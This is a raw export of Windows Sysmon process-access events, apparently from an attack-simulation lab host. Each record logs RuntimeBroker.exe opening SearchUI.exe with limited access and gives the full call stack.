13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011576Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1382d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9 10341000x800000000000000011573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11620|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011570Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011569Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011568Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 